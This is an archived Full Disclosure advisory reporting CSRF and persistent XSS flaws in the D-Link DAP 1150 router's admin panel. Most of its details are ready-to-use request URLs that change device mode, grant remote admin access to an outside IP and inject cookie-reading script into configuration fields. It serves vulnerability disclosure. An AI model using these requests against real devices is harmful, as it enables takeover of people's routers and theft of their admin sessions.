[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] Multiple CSRF and XSS vulnerabilities in D-Link DAP 1150
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Mon, 28 Apr 2014 23:29:24 +0300
Hello list!
In 2011 and beginning of 2012 I wrote about multiple vulnerabilities
(http://securityvulns.ru/docs27440.html,
http://securityvulns.ru/docs27677.html,
http://securityvulns.ru/docs27676.html) in D-Link DAP 1150 (several dozens).
That time I wrote about vulnerabilities in admin panel in Access Point mode
and now I'll write about holes in Router mode.
I present new vulnerabilities in this device. There are Cross-Site Request
Forgery and Cross-Site Scripting vulnerabilities in D-Link DAP 1150 (Wi-Fi
Access Point and Router).
SecurityVulns ID: 12076.
-------------------------
Affected products:
-------------------------
Vulnerable is the next model: D-Link DAP 1150, Firmware version 1.2.94. This
model with other firmware versions also must be vulnerable. D-Link ignored
all vulnerabilities in this device (as in other devices, which I informed
them about) and still didn't fix them.
----------
Details:
----------
I remind you, that in the first report about vulnerabilities in D-Link DAP
1150 (http://securityvulns.ru/docs27440.html), I wrote about CSRF in login
form and other vulnerabilities, which allow to remotely log into admin panel
for conducting CSRF and XSS attacks inside admin panel.
CSRF (WASC-09):
In section Advanced / Device via CSRF it's possible to change device mode.
If access point mode is on, then for attack on vulnerabilities in router
mode it's needed to turn on this mode.
Turn on access point mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22ap%22}&res_pos=0
Turn on router mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=112&res_struct_size=0&res_buf={%22device_mode%22:%22router%22}&res_pos=0
CSRF (WASC-09):
In section Advanced / Remote access via CSRF it's possible to add, edit and
delete settings of remote access to web interface. The next request will
allow remote access to admin panel from IP 50.50.50.50.
Add:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Edit:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%2250.50.50.50%22,%20%22source_mask%22:%22255.255.255.0%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
Delete:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=2&res_config_id=16&res_struct_size=0&res_pos=0
XSS (WASC-08):
These are persistent XSS. The code will execute in section Advanced / Remote
access.
Attack via add function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=-1
Attack via edit function in parameter res_buf (in fields: IP address, Mask):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=16&res_struct_size=0&res_buf={%22ips%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22source_mask%22:%22%3Cscript%3Ealert(document.cookie)%3C/script%3E%22,%20%22sport%22:80,%20%22dport%22:%2280%22}&res_pos=0
I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7137/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/